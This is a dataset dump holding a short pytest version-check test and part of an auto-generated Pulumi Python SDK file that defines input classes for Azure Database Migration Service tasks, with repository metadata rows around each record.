| LucaCappelletti94/setup_python_package
| 61b5f3cff1ed3181f932293c63c4fcb71cbe0062
| ["MIT"] | 2
| 2020-12-18T01:47:55.000Z
| 2020-12-25T10:08:30.000Z
| tests/test_version.py
| LucaCappelletti94/setup_python_package
| 61b5f3cff1ed3181f932293c63c4fcb71cbe0062
| ["MIT"] | null | null | null |
from validate_version_code import validate_version_code
from setup_python_package.__version__ import __version__
def test_version():
assert validate_version_code(__version__)
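# Editor's note (an assumption about the library's behaviour, not asserted by
# this file): validate_version_code is taken to return a boolean indicating
# whether a version string is well formed, so the whole test reduces to a
# single assertion. For example:
#
#   assert validate_version_code('1.2.3')
#   assert not validate_version_code('not-a-version')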
| 35.8
| 56
| 0.877095
| 23
| 179
| 5.913043
| 0.478261
| 0.330882
| 0.419118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 5
| 57
| 35.8
| 0.834356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 8
| c707c2b49ca849d5bf51ee322ad464c1caadb9f1
| 138,917
| py
| Python
| sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
| pulumi-bot/pulumi-azure-native
| f7b9490b5211544318e455e5cceafe47b628e12c
| ["Apache-2.0"] | 31
| 2020-09-21T09:41:01.000Z
| 2021-02-26T13:21:59.000Z
| sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
| pulumi-bot/pulumi-azure-native
| f7b9490b5211544318e455e5cceafe47b628e12c
| ["Apache-2.0"] | 231
| 2020-09-21T09:38:45.000Z
| 2021-03-01T11:16:03.000Z
| sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
| pulumi-bot/pulumi-azure-native
| f7b9490b5211544318e455e5cceafe47b628e12c
| ["Apache-2.0"] | 4
| 2020-09-29T14:14:59.000Z
| 2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ._enums import *
__all__ = [
'AzureActiveDirectoryAppArgs',
'BlobShareArgs',
'ConnectToSourcePostgreSqlSyncTaskInputArgs',
'ConnectToSourcePostgreSqlSyncTaskPropertiesArgs',
'ConnectToSourceSqlServerSyncTaskPropertiesArgs',
'ConnectToSourceSqlServerTaskInputArgs',
'ConnectToSourceSqlServerTaskPropertiesArgs',
'ConnectToTargetAzureDbForMySqlTaskInputArgs',
'ConnectToTargetAzureDbForMySqlTaskPropertiesArgs',
'ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs',
'ConnectToTargetAzureDbForPostgreSqlSyncTaskPropertiesArgs',
'ConnectToTargetSqlDbTaskInputArgs',
'ConnectToTargetSqlDbTaskPropertiesArgs',
'ConnectToTargetSqlMISyncTaskInputArgs',
'ConnectToTargetSqlMISyncTaskPropertiesArgs',
'ConnectToTargetSqlMITaskInputArgs',
'ConnectToTargetSqlMITaskPropertiesArgs',
'ConnectToTargetSqlSqlDbSyncTaskInputArgs',
'ConnectToTargetSqlSqlDbSyncTaskPropertiesArgs',
'DatabaseInfoArgs',
'FileShareArgs',
'GetTdeCertificatesSqlTaskInputArgs',
'GetTdeCertificatesSqlTaskPropertiesArgs',
'GetUserTablesSqlSyncTaskInputArgs',
'GetUserTablesSqlSyncTaskPropertiesArgs',
'GetUserTablesSqlTaskInputArgs',
'GetUserTablesSqlTaskPropertiesArgs',
'MiSqlConnectionInfoArgs',
'MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs',
'MigrateMySqlAzureDbForMySqlSyncTaskInputArgs',
'MigrateMySqlAzureDbForMySqlSyncTaskPropertiesArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncTaskPropertiesArgs',
'MigrateSqlServerSqlDbDatabaseInputArgs',
'MigrateSqlServerSqlDbSyncDatabaseInputArgs',
'MigrateSqlServerSqlDbSyncTaskInputArgs',
'MigrateSqlServerSqlDbSyncTaskPropertiesArgs',
'MigrateSqlServerSqlDbTaskInputArgs',
'MigrateSqlServerSqlDbTaskPropertiesArgs',
'MigrateSqlServerSqlMIDatabaseInputArgs',
'MigrateSqlServerSqlMISyncTaskInputArgs',
'MigrateSqlServerSqlMISyncTaskPropertiesArgs',
'MigrateSqlServerSqlMITaskInputArgs',
'MigrateSqlServerSqlMITaskPropertiesArgs',
'MigrationValidationOptionsArgs',
'MySqlConnectionInfoArgs',
'PostgreSqlConnectionInfoArgs',
'SelectedCertificateInputArgs',
'ServiceSkuArgs',
'SqlConnectionInfoArgs',
'ValidateMigrationInputSqlServerSqlDbSyncTaskPropertiesArgs',
'ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs',
'ValidateMigrationInputSqlServerSqlMISyncTaskPropertiesArgs',
'ValidateMigrationInputSqlServerSqlMITaskInputArgs',
'ValidateMigrationInputSqlServerSqlMITaskPropertiesArgs',
'ValidateSyncMigrationInputSqlServerTaskInputArgs',
]
@pulumi.input_type
class AzureActiveDirectoryAppArgs:
def __init__(__self__, *,
app_key: pulumi.Input[str],
application_id: pulumi.Input[str],
tenant_id: pulumi.Input[str]):
"""
Azure Active Directory Application
:param pulumi.Input[str] app_key: Key used to authenticate to the Azure Active Directory Application
:param pulumi.Input[str] application_id: Application ID of the Azure Active Directory Application
:param pulumi.Input[str] tenant_id: Tenant id of the customer
"""
pulumi.set(__self__, "app_key", app_key)
pulumi.set(__self__, "application_id", application_id)
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter(name="appKey")
def app_key(self) -> pulumi.Input[str]:
"""
Key used to authenticate to the Azure Active Directory Application
"""
return pulumi.get(self, "app_key")
@app_key.setter
def app_key(self, value: pulumi.Input[str]):
pulumi.set(self, "app_key", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Input[str]:
"""
Application ID of the Azure Active Directory Application
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Input[str]:
"""
Tenant id of the customer
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: pulumi.Input[str]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class BlobShareArgs:
def __init__(__self__, *,
sas_uri: pulumi.Input[str]):
"""
Blob container storage information.
:param pulumi.Input[str] sas_uri: SAS URI of Azure Storage Account Container.
"""
pulumi.set(__self__, "sas_uri", sas_uri)
@property
@pulumi.getter(name="sasUri")
def sas_uri(self) -> pulumi.Input[str]:
"""
SAS URI of Azure Storage Account Container.
"""
return pulumi.get(self, "sas_uri")
@sas_uri.setter
def sas_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "sas_uri", value)
@pulumi.input_type
class ConnectToSourcePostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that validates connection to PostgreSQL and source server requirements
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@pulumi.input_type
class ConnectToSourcePostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to PostgreSQL server and source server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.PostgreSql.Sync'.
:param pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.PostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.PostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToSourceSqlServerSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL Server and source server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.SqlServer.Sync'.
:param pulumi.Input['ConnectToSourceSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.SqlServer.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.SqlServer.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToSourceSqlServerTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
check_permissions_group: Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]] = None,
collect_agent_jobs: Optional[pulumi.Input[bool]] = None,
collect_logins: Optional[pulumi.Input[bool]] = None):
"""
Input for the task that validates connection to SQL Server and also validates source server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for Source SQL Server
:param pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']] check_permissions_group: Permission group for validations
:param pulumi.Input[bool] collect_agent_jobs: Flag for whether to collect agent jobs from source server.
:param pulumi.Input[bool] collect_logins: Flag for whether to collect logins from source server.
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
if check_permissions_group is not None:
pulumi.set(__self__, "check_permissions_group", check_permissions_group)
        if collect_agent_jobs is None:
            collect_agent_jobs = False
        pulumi.set(__self__, "collect_agent_jobs", collect_agent_jobs)
        if collect_logins is None:
            collect_logins = False
        pulumi.set(__self__, "collect_logins", collect_logins)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for Source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="checkPermissionsGroup")
def check_permissions_group(self) -> Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]]:
"""
Permission group for validations
"""
return pulumi.get(self, "check_permissions_group")
@check_permissions_group.setter
def check_permissions_group(self, value: Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]]):
pulumi.set(self, "check_permissions_group", value)
@property
@pulumi.getter(name="collectAgentJobs")
def collect_agent_jobs(self) -> Optional[pulumi.Input[bool]]:
"""
Flag for whether to collect agent jobs from source server.
"""
return pulumi.get(self, "collect_agent_jobs")
@collect_agent_jobs.setter
def collect_agent_jobs(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "collect_agent_jobs", value)
@property
@pulumi.getter(name="collectLogins")
def collect_logins(self) -> Optional[pulumi.Input[bool]]:
"""
Flag for whether to collect logins from source server.
"""
return pulumi.get(self, "collect_logins")
@collect_logins.setter
def collect_logins(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "collect_logins", value)
@pulumi.input_type
class ConnectToSourceSqlServerTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL Server and also validates source server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.SqlServer'.
:param pulumi.Input['ConnectToSourceSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.SqlServer')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.SqlServer'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetAzureDbForMySqlTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['MySqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['MySqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure Database for MySQL and target server requirements
:param pulumi.Input['MySqlConnectionInfoArgs'] source_connection_info: Connection information for source MySQL server
:param pulumi.Input['MySqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for MySQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for source MySQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for MySQL server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetAzureDbForMySqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure Database for MySQL and target server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureDbForMySql'.
:param pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureDbForMySql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureDbForMySql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure Database for PostgreSQL and target server requirements
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL server
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for PostgreSQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for PostgreSQL server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetAzureDbForPostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']] = None):
"""
        Properties for the task that validates connection to Azure Database for PostgreSQL server and target server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureDbForPostgreSql.Sync'.
:param pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureDbForPostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureDbForPostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlDbTaskInputArgs:
def __init__(__self__, *,
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to SQL DB and target server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL DB
"""
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlDbTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL DB and target server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.SqlDb'.
:param pulumi.Input['ConnectToTargetSqlDbTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.SqlDb')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.SqlDb'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs']):
"""
        Input for the task that validates connection to Azure SQL Database Managed Instance for the online scenario.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlMITaskInputArgs:
def __init__(__self__, *,
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure SQL Database Managed Instance.
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL Server
"""
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL Server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI'.
:param pulumi.Input['ConnectToTargetSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlSqlDbSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure SQL DB and target server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL DB
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL DB and target server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.SqlDb.Sync'.
:param pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.SqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.SqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class DatabaseInfoArgs:
def __init__(__self__, *,
source_database_name: pulumi.Input[str]):
"""
Project Database Details
:param pulumi.Input[str] source_database_name: Name of the database
"""
pulumi.set(__self__, "source_database_name", source_database_name)
@property
@pulumi.getter(name="sourceDatabaseName")
def source_database_name(self) -> pulumi.Input[str]:
"""
Name of the database
"""
return pulumi.get(self, "source_database_name")
@source_database_name.setter
def source_database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "source_database_name", value)
@pulumi.input_type
class FileShareArgs:
def __init__(__self__, *,
path: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
File share information with Path, Username, and Password.
:param pulumi.Input[str] path: The folder path for this share.
:param pulumi.Input[str] password: Password credential used to connect to the share location.
:param pulumi.Input[str] user_name: User name credential to connect to the share location
"""
pulumi.set(__self__, "path", path)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
The folder path for this share.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential used to connect to the share location.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name credential to connect to the share location
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class GetTdeCertificatesSqlTaskInputArgs:
def __init__(__self__, *,
backup_file_share: pulumi.Input['FileShareArgs'],
